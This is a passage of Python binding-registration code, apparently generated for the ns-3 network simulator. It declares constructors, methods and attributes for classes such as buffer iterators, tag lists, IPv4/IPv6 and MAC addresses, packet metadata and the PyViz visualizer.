    # Cursor movement: by one position or by an explicit delta.
    cls.add_method('Next', 'void', [])
    cls.add_method('Next', 'void', [param('uint32_t', 'delta')])
    cls.add_method('Prev', 'void', [])
    cls.add_method('Prev', 'void', [param('uint32_t', 'delta')])
    # Bulk read into a caller-supplied byte array.
    cls.add_method('Read', 'void', [param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
    # Typed integer readers (ReadLsbtohU*, ReadNtohU*, ReadU*) for
    # 16/32/64-bit widths, registered in the original order.
    for read_prefix in ('ReadLsbtohU', 'ReadNtohU', 'ReadU'):
        for width in (16, 32, 64):
            cls.add_method('%s%d' % (read_prefix, width), 'uint%d_t' % width, [])
    cls.add_method('ReadU8', 'uint8_t', [])
    # Bulk writes: from a raw byte array or from another iterator range.
    cls.add_method('Write', 'void', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    cls.add_method('Write', 'void', [param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
    # Typed integer writers, mirroring the reader families above.
    for write_prefix in ('WriteHtolsbU', 'WriteHtonU', 'WriteU'):
        for width in (16, 32, 64):
            cls.add_method('%s%d' % (write_prefix, width), 'void', [param('uint%d_t' % width, 'data')])
    # WriteU8 overloads: single byte, and the byte-plus-length variant.
    cls.add_method('WriteU8', 'void', [param('uint8_t', 'data')])
    cls.add_method('WriteU8', 'void', [param('uint8_t', 'data'), param('uint32_t', 'len')])
    return
def register_Ns3ByteTagIterator_methods(root_module, cls):
    """Register ns3::ByteTagIterator (packet.h): copy constructor plus the
    HasNext/Next iteration protocol."""
    # Copy constructor.
    cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
    # bool HasNext() const.
    cls.add_method('HasNext', 'bool', [], is_const=True)
    # Item Next().
    cls.add_method('Next', 'ns3::ByteTagIterator::Item', [])
    return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
    """Register ns3::ByteTagIterator::Item (packet.h): copy constructor and
    the const accessors for the tag's byte range, payload and type."""
    # Copy constructor.
    cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
    # uint32_t GetEnd() / GetStart() const.
    for range_getter in ('GetEnd', 'GetStart'):
        cls.add_method(range_getter, 'uint32_t', [], is_const=True)
    # void GetTag(ns3::Tag & tag) const.
    cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True)
    # ns3::TypeId GetTypeId() const.
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True)
    return
def register_Ns3ByteTagList_methods(root_module, cls):
    """Register ns3::ByteTagList (byte-tag-list.h): constructors, the two Add
    overloads, offset-adjustment helpers, Begin and RemoveAll."""
    # Default and copy constructors.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::ByteTagList const &', 'o')])
    # TagBuffer Add(tid, bufferSize, start, end).
    cls.add_method('Add', 'ns3::TagBuffer',
                   [param('ns3::TypeId', 'tid'), param('uint32_t', 'bufferSize'), param('int32_t', 'start'), param('int32_t', 'end')])
    # void Add(const ByteTagList &).
    cls.add_method('Add', 'void', [param('ns3::ByteTagList const &', 'o')])
    # Offset adjustments at either end of the list.
    cls.add_method('AddAtEnd', 'void', [param('int32_t', 'adjustment'), param('int32_t', 'appendOffset')])
    cls.add_method('AddAtStart', 'void', [param('int32_t', 'adjustment'), param('int32_t', 'prependOffset')])
    # Iterator Begin(offsetStart, offsetEnd) const.
    cls.add_method('Begin', 'ns3::ByteTagList::Iterator',
                   [param('int32_t', 'offsetStart'), param('int32_t', 'offsetEnd')], is_const=True)
    # void RemoveAll().
    cls.add_method('RemoveAll', 'void', [])
    return
def register_Ns3ByteTagListIterator_methods(root_module, cls):
    """Register ns3::ByteTagList::Iterator (byte-tag-list.h): copy constructor,
    offset accessor, and the HasNext/Next iteration protocol."""
    # Copy constructor.
    cls.add_constructor([param('ns3::ByteTagList::Iterator const &', 'arg0')])
    # uint32_t GetOffsetStart() const.
    cls.add_method('GetOffsetStart', 'uint32_t', [], is_const=True)
    # bool HasNext() const.
    cls.add_method('HasNext', 'bool', [], is_const=True)
    # Item Next().
    cls.add_method('Next', 'ns3::ByteTagList::Iterator::Item', [])
    return
def register_Ns3ByteTagListIteratorItem_methods(root_module, cls):
    """Register ns3::ByteTagList::Iterator::Item (byte-tag-list.h): its two
    constructors and five public data members."""
    # Copy constructor and the TagBuffer-based constructor.
    cls.add_constructor([param('ns3::ByteTagList::Iterator::Item const &', 'arg0')])
    cls.add_constructor([param('ns3::TagBuffer', 'buf')])
    # Mutable public fields, registered in the original order.
    for field_name, cpp_type in (
            ('buf', 'ns3::TagBuffer'),
            ('end', 'int32_t'),
            ('size', 'uint32_t'),
            ('start', 'int32_t'),
            ('tid', 'ns3::TypeId')):
        cls.add_instance_attribute(field_name, cpp_type, is_const=False)
    return
def register_Ns3CallbackBase_methods(root_module, cls):
    """Register bindings for ns3::CallbackBase (callback.h, module 'core')."""
    # Public constructors: copy constructor, then the default constructor.
    cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
    cls.add_constructor([])
    # Ptr<CallbackImplBase> GetImpl() const
    cls.add_method('GetImpl', 'ns3::Ptr< ns3::CallbackImplBase >', [],
                   is_const=True)
    # Protected constructor taking the implementation pointer.
    cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
                        visibility='protected')
    # static std::string Demangle(std::string const & mangled) -- protected.
    cls.add_method('Demangle', 'std::string',
                   [param('std::string const &', 'mangled')],
                   is_static=True, visibility='protected')
    return
def register_Ns3EventId_methods(root_module, cls):
    """Register bindings for ns3::EventId (event-id.h, module 'core')."""
    # Comparison operators.
    cls.add_binary_comparison_operator('!=')
    cls.add_binary_comparison_operator('==')
    # Constructors: copy, default, and the full (impl, ts, context, uid) form.
    cls.add_constructor([param('ns3::EventId const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ptr< ns3::EventImpl > const &', 'impl'),
                         param('uint64_t', 'ts'),
                         param('uint32_t', 'context'),
                         param('uint32_t', 'uid')])
    # void Cancel() -- the only mutating member function.
    cls.add_method('Cancel', 'void', [])
    # Zero-argument const accessors and predicates, in the generator's
    # original order.
    for method_name, return_type in (('GetContext', 'uint32_t'),
                                     ('GetTs', 'uint64_t'),
                                     ('GetUid', 'uint32_t'),
                                     ('IsExpired', 'bool'),
                                     ('IsRunning', 'bool'),
                                     ('PeekEventImpl', 'ns3::EventImpl *')):
        cls.add_method(method_name, return_type, [], is_const=True)
    return
def register_Ns3Ipv4Address_methods(root_module, cls):
    """Register bindings for ns3::Ipv4Address (ipv4-address.h, module 'network')."""
    # Comparison and stream-insertion operators.
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: copy, default, from host-order uint32_t, and from a
    # dotted-quad string.
    for ctor_params in ([param('ns3::Ipv4Address const &', 'arg0')],
                        [],
                        [param('uint32_t', 'address')],
                        [param('char const *', 'address')]):
        cls.add_constructor(ctor_params)
    cls.add_method('CombineMask', 'ns3::Ipv4Address',
                   [param('ns3::Ipv4Mask const &', 'mask')], is_const=True)
    cls.add_method('ConvertFrom', 'ns3::Ipv4Address',
                   [param('ns3::Address const &', 'address')], is_static=True)
    cls.add_method('Deserialize', 'ns3::Ipv4Address',
                   [param('uint8_t const *', 'buf')], is_static=True)
    cls.add_method('Get', 'uint32_t', [], is_const=True)
    # Static zero-argument factories for well-known addresses.
    for factory_name in ('GetAny', 'GetBroadcast', 'GetLoopback'):
        cls.add_method(factory_name, 'ns3::Ipv4Address', [], is_static=True)
    cls.add_method('GetSubnetDirectedBroadcast', 'ns3::Ipv4Address',
                   [param('ns3::Ipv4Mask const &', 'mask')], is_const=True)
    cls.add_method('GetZero', 'ns3::Ipv4Address', [], is_static=True)
    # Predicates and helpers, in the generator's original order.
    cls.add_method('IsBroadcast', 'bool', [], is_const=True)
    cls.add_method('IsEqual', 'bool',
                   [param('ns3::Ipv4Address const &', 'other')], is_const=True)
    cls.add_method('IsLocalMulticast', 'bool', [], is_const=True)
    cls.add_method('IsMatchingType', 'bool',
                   [param('ns3::Address const &', 'address')], is_static=True)
    cls.add_method('IsMulticast', 'bool', [], is_const=True)
    cls.add_method('IsSubnetDirectedBroadcast', 'bool',
                   [param('ns3::Ipv4Mask const &', 'mask')], is_const=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')],
                   is_const=True)
    cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')],
                   is_const=True)
    # Set() overloads: from uint32_t, then from string (registration order
    # matters for overload resolution, so it is preserved).
    cls.add_method('Set', 'void', [param('uint32_t', 'address')])
    cls.add_method('Set', 'void', [param('char const *', 'address')])
    return
def register_Ns3Ipv4InterfaceAddress_methods(root_module, cls):
    """Register bindings for ns3::Ipv4InterfaceAddress (ipv4-interface-address.h, module 'internet')."""
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: default, (local, mask), then copy.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Ipv4Address', 'local'),
                         param('ns3::Ipv4Mask', 'mask')])
    cls.add_constructor([param('ns3::Ipv4InterfaceAddress const &', 'o')])
    # Zero-argument const accessors, in the generator's original order.
    for method_name, return_type in (
            ('GetBroadcast', 'ns3::Ipv4Address'),
            ('GetLocal', 'ns3::Ipv4Address'),
            ('GetMask', 'ns3::Ipv4Mask'),
            ('GetScope', 'ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e'),
            ('IsSecondary', 'bool')):
        cls.add_method(method_name, return_type, [], is_const=True)
    # Setters.
    cls.add_method('SetBroadcast', 'void', [param('ns3::Ipv4Address', 'broadcast')])
    cls.add_method('SetLocal', 'void', [param('ns3::Ipv4Address', 'local')])
    cls.add_method('SetMask', 'void', [param('ns3::Ipv4Mask', 'mask')])
    cls.add_method('SetPrimary', 'void', [])
    cls.add_method('SetScope', 'void',
                   [param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')])
    cls.add_method('SetSecondary', 'void', [])
    return
def register_Ns3Ipv4Mask_methods(root_module, cls):
    """Register bindings for ns3::Ipv4Mask (ipv4-address.h, module 'network')."""
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: copy, default, from raw uint32_t, from dotted-quad string.
    for ctor_params in ([param('ns3::Ipv4Mask const &', 'arg0')],
                        [],
                        [param('uint32_t', 'mask')],
                        [param('char const *', 'mask')]):
        cls.add_constructor(ctor_params)
    # Const accessors and static factories, interleaved in the generator's
    # original (alphabetical) order.
    cls.add_method('Get', 'uint32_t', [], is_const=True)
    cls.add_method('GetInverse', 'uint32_t', [], is_const=True)
    cls.add_method('GetLoopback', 'ns3::Ipv4Mask', [], is_static=True)
    cls.add_method('GetOnes', 'ns3::Ipv4Mask', [], is_static=True)
    cls.add_method('GetPrefixLength', 'uint16_t', [], is_const=True)
    cls.add_method('GetZero', 'ns3::Ipv4Mask', [], is_static=True)
    # Comparison / matching helpers.
    cls.add_method('IsEqual', 'bool', [param('ns3::Ipv4Mask', 'other')],
                   is_const=True)
    cls.add_method('IsMatch', 'bool',
                   [param('ns3::Ipv4Address', 'a'), param('ns3::Ipv4Address', 'b')],
                   is_const=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')],
                   is_const=True)
    cls.add_method('Set', 'void', [param('uint32_t', 'mask')])
    return
def register_Ns3Ipv6Address_methods(root_module, cls):
    """Register bindings for ns3::Ipv6Address (ipv6-address.h, module 'network')."""
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: default, from string, from raw bytes, copy, from pointer.
    for ctor_params in ([],
                        [param('char const *', 'address')],
                        [param('uint8_t *', 'address')],
                        [param('ns3::Ipv6Address const &', 'addr')],
                        [param('ns3::Ipv6Address const *', 'addr')]):
        cls.add_constructor(ctor_params)
    # Ipv6Address CombinePrefix(Ipv6Prefix const &) -- not const in the C++ API.
    cls.add_method('CombinePrefix', 'ns3::Ipv6Address',
                   [param('ns3::Ipv6Prefix const &', 'prefix')])
    cls.add_method('ConvertFrom', 'ns3::Ipv6Address',
                   [param('ns3::Address const &', 'address')], is_static=True)
    cls.add_method('Deserialize', 'ns3::Ipv6Address',
                   [param('uint8_t const *', 'buf')], is_static=True)
    # Static zero-argument factories for well-known addresses.
    for factory_name in ('GetAllHostsMulticast', 'GetAllNodesMulticast',
                         'GetAllRoutersMulticast', 'GetAny'):
        cls.add_method(factory_name, 'ns3::Ipv6Address', [], is_static=True)
    cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')],
                   is_const=True)
    for factory_name in ('GetLoopback', 'GetOnes', 'GetZero'):
        cls.add_method(factory_name, 'ns3::Ipv6Address', [], is_static=True)
    # Zero-argument const predicates.
    for predicate_name in ('IsAllHostsMulticast', 'IsAllNodesMulticast',
                           'IsAllRoutersMulticast', 'IsAny'):
        cls.add_method(predicate_name, 'bool', [], is_const=True)
    cls.add_method('IsEqual', 'bool',
                   [param('ns3::Ipv6Address const &', 'other')], is_const=True)
    for predicate_name in ('IsLinkLocal', 'IsLocalhost'):
        cls.add_method(predicate_name, 'bool', [], is_const=True)
    cls.add_method('IsMatchingType', 'bool',
                   [param('ns3::Address const &', 'address')], is_static=True)
    for predicate_name in ('IsMulticast', 'IsSolicitedMulticast'):
        cls.add_method(predicate_name, 'bool', [], is_const=True)
    # Static address-construction helpers.
    cls.add_method('MakeAutoconfiguredAddress', 'ns3::Ipv6Address',
                   [param('ns3::Mac48Address', 'addr'), param('ns3::Ipv6Address', 'prefix')],
                   is_static=True)
    cls.add_method('MakeAutoconfiguredLinkLocalAddress', 'ns3::Ipv6Address',
                   [param('ns3::Mac48Address', 'mac')], is_static=True)
    cls.add_method('MakeSolicitedAddress', 'ns3::Ipv6Address',
                   [param('ns3::Ipv6Address', 'addr')], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')],
                   is_const=True)
    cls.add_method('Serialize', 'void', [param('uint8_t *', 'buf')],
                   is_const=True)
    # Set() overloads: from string, then from raw bytes (registration order
    # matters for overload resolution, so it is preserved).
    cls.add_method('Set', 'void', [param('char const *', 'address')])
    cls.add_method('Set', 'void', [param('uint8_t *', 'address')])
    return
def register_Ns3Ipv6Prefix_methods(root_module, cls):
    """Register bindings for ns3::Ipv6Prefix (ipv6-address.h, module 'network')."""
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors, in the generator's order: default, from raw bytes, from
    # string, from a prefix length, copy, and from pointer.
    for ctor_params in ([],
                        [param('uint8_t *', 'prefix')],
                        [param('char const *', 'prefix')],
                        [param('uint8_t', 'prefix')],
                        [param('ns3::Ipv6Prefix const &', 'prefix')],
                        [param('ns3::Ipv6Prefix const *', 'prefix')]):
        cls.add_constructor(ctor_params)
    cls.add_method('GetBytes', 'void', [param('uint8_t *', 'buf')],
                   is_const=True)
    # Static factories for well-known prefixes, plus the length accessor.
    cls.add_method('GetLoopback', 'ns3::Ipv6Prefix', [], is_static=True)
    cls.add_method('GetOnes', 'ns3::Ipv6Prefix', [], is_static=True)
    cls.add_method('GetPrefixLength', 'uint8_t', [], is_const=True)
    cls.add_method('GetZero', 'ns3::Ipv6Prefix', [], is_static=True)
    # Comparison / matching helpers.
    cls.add_method('IsEqual', 'bool',
                   [param('ns3::Ipv6Prefix const &', 'other')], is_const=True)
    cls.add_method('IsMatch', 'bool',
                   [param('ns3::Ipv6Address', 'a'), param('ns3::Ipv6Address', 'b')],
                   is_const=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')],
                   is_const=True)
    return
def register_Ns3Mac48Address_methods(root_module, cls):
    """Register bindings for ns3::Mac48Address (mac48-address.h, module 'network')."""
    cls.add_binary_comparison_operator('<')
    cls.add_binary_comparison_operator('!=')
    cls.add_output_stream_operator()
    cls.add_binary_comparison_operator('==')
    # Constructors: copy, default, and from an "xx:xx:xx:xx:xx:xx" string.
    cls.add_constructor([param('ns3::Mac48Address const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('char const *', 'str')])
    # static Mac48Address Allocate()
    cls.add_method('Allocate', 'ns3::Mac48Address', [], is_static=True)
    cls.add_method('ConvertFrom', 'ns3::Mac48Address',
                   [param('ns3::Address const &', 'address')], is_static=True)
    # Raw-byte (de)serialization of the 6-byte address.
    cls.add_method('CopyFrom', 'void', [param('uint8_t const *', 'buffer')])
    cls.add_method('CopyTo', 'void', [param('uint8_t *', 'buffer')],
                   is_const=True)
    cls.add_method('GetBroadcast', 'ns3::Mac48Address', [], is_static=True)
    # GetMulticast overloads: IPv4 argument first, then IPv6 (registration
    # order matters for overload resolution, so it is preserved).
    cls.add_method('GetMulticast', 'ns3::Mac48Address',
                   [param('ns3::Ipv4Address', 'address')], is_static=True)
    cls.add_method('GetMulticast', 'ns3::Mac48Address',
                   [param('ns3::Ipv6Address', 'address')], is_static=True)
    cls.add_method('GetMulticast6Prefix', 'ns3::Mac48Address', [],
                   is_static=True)
    cls.add_method('GetMulticastPrefix', 'ns3::Mac48Address', [],
                   is_static=True)
    # Predicates.
    cls.add_method('IsBroadcast', 'bool', [], is_const=True)
    cls.add_method('IsGroup', 'bool', [], is_const=True)
    cls.add_method('IsMatchingType', 'bool',
                   [param('ns3::Address const &', 'address')], is_static=True)
    return
def register_Ns3ObjectBase_methods(root_module, cls):
    """Register Python bindings for ns3::ObjectBase (object-base.h, module 'core').

    Generated registration code: each ``cls.add_*`` call mirrors one C++
    constructor or member function, including its visibility and
    virtual/pure-virtual flags.  NOTE(review): this appears to be
    bindings-generator output -- presumably changes belong in the generator
    input, not here; confirm before hand-editing.
    """
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
    cls.add_constructor([])
    ## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
    cls.add_method('GetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
                   is_const=True)
    ## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
    cls.add_method('GetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
                   is_const=True)
    ## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttribute',
                   'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
    cls.add_method('SetAttributeFailSafe',
                   'bool',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceConnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnect',
                   'bool',
                   [param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
    cls.add_method('TraceDisconnectWithoutContext',
                   'bool',
                   [param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
    ## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
    cls.add_method('ConstructSelf',
                   'void',
                   [param('ns3::AttributeConstructionList const &', 'attributes')],
                   visibility='protected')
    ## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
    cls.add_method('NotifyConstructionCompleted',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    return
def register_Ns3ObjectDeleter_methods(root_module, cls):
    """Register bindings for ns3::ObjectDeleter (object.h, module 'core')."""
    # Default constructor, then copy constructor.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::ObjectDeleter const &', 'arg0')])
    # static void Delete(ns3::Object * object)
    cls.add_method('Delete', 'void', [param('ns3::Object *', 'object')],
                   is_static=True)
    return
def register_Ns3ObjectFactory_methods(root_module, cls):
    """Register bindings for ns3::ObjectFactory (object-factory.h, module 'core')."""
    cls.add_output_stream_operator()
    # Constructors: copy, default, and from a TypeId name string.
    cls.add_constructor([param('ns3::ObjectFactory const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('std::string', 'typeId')])
    # Ptr<Object> Create() const
    cls.add_method('Create', 'ns3::Ptr< ns3::Object >', [], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True)
    # void Set(name, value)
    cls.add_method('Set', 'void',
                   [param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
    # SetTypeId overloads -- TypeId, C string, std::string -- registered in
    # the generator's original order (overload resolution order preserved).
    for overload_params in ([param('ns3::TypeId', 'tid')],
                            [param('char const *', 'tid')],
                            [param('std::string', 'tid')]):
        cls.add_method('SetTypeId', 'void', overload_params)
    return
def register_Ns3PacketMetadata_methods(root_module, cls):
    """Register bindings for ns3::PacketMetadata (packet-metadata.h, module 'network')."""
    # Constructors: (uid, size) and copy.
    cls.add_constructor([param('uint64_t', 'uid'), param('uint32_t', 'size')])
    cls.add_constructor([param('ns3::PacketMetadata const &', 'o')])
    # Mutators appending/removing headers, trailers, and padding.
    cls.add_method('AddAtEnd', 'void', [param('ns3::PacketMetadata const &', 'o')])
    cls.add_method('AddHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
    cls.add_method('AddPaddingAtEnd', 'void', [param('uint32_t', 'end')])
    cls.add_method('AddTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
    # Const accessors / iteration / fragmentation.
    cls.add_method('BeginItem', 'ns3::PacketMetadata::ItemIterator', [param('ns3::Buffer', 'buffer')], is_const=True)
    cls.add_method('CreateFragment', 'ns3::PacketMetadata', [param('uint32_t', 'start'), param('uint32_t', 'end')], is_const=True)
    cls.add_method('Deserialize', 'uint32_t', [param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
    # Static switches that turn metadata recording / checking on.
    cls.add_method('Enable', 'void', [], is_static=True)
    cls.add_method('EnableChecking', 'void', [], is_static=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    cls.add_method('GetUid', 'uint64_t', [], is_const=True)
    cls.add_method('RemoveAtEnd', 'void', [param('uint32_t', 'end')])
    cls.add_method('RemoveAtStart', 'void', [param('uint32_t', 'start')])
    cls.add_method('RemoveHeader', 'void', [param('ns3::Header const &', 'header'), param('uint32_t', 'size')])
    cls.add_method('RemoveTrailer', 'void', [param('ns3::Trailer const &', 'trailer'), param('uint32_t', 'size')])
    cls.add_method('Serialize', 'uint32_t', [param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True)
    return
def register_Ns3PacketMetadataItem_methods(root_module, cls):
    """Register bindings for ns3::PacketMetadata::Item (packet-metadata.h, module 'network')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketMetadata::Item const &', 'arg0')])
    # Public data members exposed as mutable instance attributes.
    cls.add_instance_attribute('current', 'ns3::Buffer::Iterator', is_const=False)
    cls.add_instance_attribute('currentSize', 'uint32_t', is_const=False)
    cls.add_instance_attribute('currentTrimedFromEnd', 'uint32_t', is_const=False)
    cls.add_instance_attribute('currentTrimedFromStart', 'uint32_t', is_const=False)
    cls.add_instance_attribute('isFragment', 'bool', is_const=False)
    cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
    return
def register_Ns3PacketMetadataItemIterator_methods(root_module, cls):
    """Register bindings for ns3::PacketMetadata::ItemIterator (packet-metadata.h, module 'network')."""
    cls.add_constructor([param('ns3::PacketMetadata::ItemIterator const &', 'arg0')])
    cls.add_constructor([param('ns3::PacketMetadata const *', 'metadata'), param('ns3::Buffer', 'buffer')])
    # Java-style iteration: HasNext() / Next().
    cls.add_method('HasNext', 'bool', [], is_const=True)
    cls.add_method('Next', 'ns3::PacketMetadata::Item', [])
    return
def register_Ns3PacketTagIterator_methods(root_module, cls):
    """Register bindings for ns3::PacketTagIterator (packet.h, module 'network')."""
    cls.add_constructor([param('ns3::PacketTagIterator const &', 'arg0')])
    # Java-style iteration: HasNext() / Next().
    cls.add_method('HasNext', 'bool', [], is_const=True)
    cls.add_method('Next', 'ns3::PacketTagIterator::Item', [])
    return
def register_Ns3PacketTagIteratorItem_methods(root_module, cls):
    """Register bindings for ns3::PacketTagIterator::Item (packet.h, module 'network')."""
    cls.add_constructor([param('ns3::PacketTagIterator::Item const &', 'arg0')])
    # void GetTag(ns3::Tag & tag) const -- fills the caller-provided tag.
    cls.add_method('GetTag', 'void', [param('ns3::Tag &', 'tag')], is_const=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_const=True)
    return
def register_Ns3PacketTagList_methods(root_module, cls):
    """Register bindings for ns3::PacketTagList (packet-tag-list.h, module 'network')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketTagList const &', 'o')])
    # Add is declared const in the C++ API.
    cls.add_method('Add', 'void', [param('ns3::Tag const &', 'tag')], is_const=True)
    cls.add_method('Head', 'ns3::PacketTagList::TagData const *', [], is_const=True)
    cls.add_method('Peek', 'bool', [param('ns3::Tag &', 'tag')], is_const=True)
    cls.add_method('Remove', 'bool', [param('ns3::Tag &', 'tag')])
    cls.add_method('RemoveAll', 'void', [])
    return
def register_Ns3PacketTagListTagData_methods(root_module, cls):
    """Register bindings for ns3::PacketTagList::TagData (packet-tag-list.h, module 'network')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PacketTagList::TagData const &', 'arg0')])
    # Public data members of the tag-list node.
    cls.add_instance_attribute('count', 'uint32_t', is_const=False)
    cls.add_instance_attribute('data', 'uint8_t [ 20 ]', is_const=False)
    cls.add_instance_attribute('next', 'ns3::PacketTagList::TagData *', is_const=False)
    cls.add_instance_attribute('tid', 'ns3::TypeId', is_const=False)
    return
def register_Ns3PyViz_methods(root_module, cls):
    """Register bindings for ns3::PyViz (pyviz.h, module 'visualizer')."""
    cls.add_constructor([param('ns3::PyViz const &', 'arg0')])
    cls.add_constructor([])
    # Sampling accessors returning collected statistics/samples.
    cls.add_method('GetLastPackets', 'ns3::PyViz::LastPacketsSample', [param('uint32_t', 'nodeId')], is_const=True)
    cls.add_method('GetNodesStatistics', 'std::vector< ns3::PyViz::NodeStatistics >', [], is_const=True)
    cls.add_method('GetPacketDropSamples', 'std::vector< ns3::PyViz::PacketDropSample >', [], is_const=True)
    cls.add_method('GetPauseMessages', 'std::vector< std::string >', [], is_const=True)
    cls.add_method('GetTransmissionSamples', 'std::vector< ns3::PyViz::TransmissionSample >', [], is_const=True)
    # Static geometry helper; the four line coordinates are in/out (direction=3).
    cls.add_method('LineClipping', 'void',
                   [param('double', 'boundsX1'), param('double', 'boundsY1'),
                    param('double', 'boundsX2'), param('double', 'boundsY2'),
                    param('double &', 'lineX1', direction=3), param('double &', 'lineY1', direction=3),
                    param('double &', 'lineX2', direction=3), param('double &', 'lineY2', direction=3)],
                   is_static=True)
    cls.add_method('Pause', 'void', [param('std::string const &', 'message')], is_static=True)
    # Device/trace registration hooks keyed by type or trace-path name.
    cls.add_method('RegisterCsmaLikeDevice', 'void', [param('std::string const &', 'deviceTypeName')])
    cls.add_method('RegisterDropTracePath', 'void', [param('std::string const &', 'tracePath')])
    cls.add_method('RegisterPointToPointLikeDevice', 'void', [param('std::string const &', 'deviceTypeName')])
    cls.add_method('RegisterWifiLikeDevice', 'void', [param('std::string const &', 'deviceTypeName')])
    cls.add_method('SetNodesOfInterest', 'void', [param('std::set< unsigned int >', 'nodes')])
    cls.add_method('SetPacketCaptureOptions', 'void', [param('uint32_t', 'nodeId'), param('ns3::PyViz::PacketCaptureOptions', 'options')])
    cls.add_method('SimulatorRunUntil', 'void', [param('ns3::Time', 'time')])
    return
def register_Ns3PyVizLastPacketsSample_methods(root_module, cls):
    """Register bindings for ns3::PyViz::LastPacketsSample (pyviz.h, module 'visualizer')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::PyViz::LastPacketsSample const &', 'arg0')])
    # Vectors of the most recent dropped / received / transmitted packet samples.
    cls.add_instance_attribute('lastDroppedPackets', 'std::vector< ns3::PyViz::PacketSample >', is_const=False)
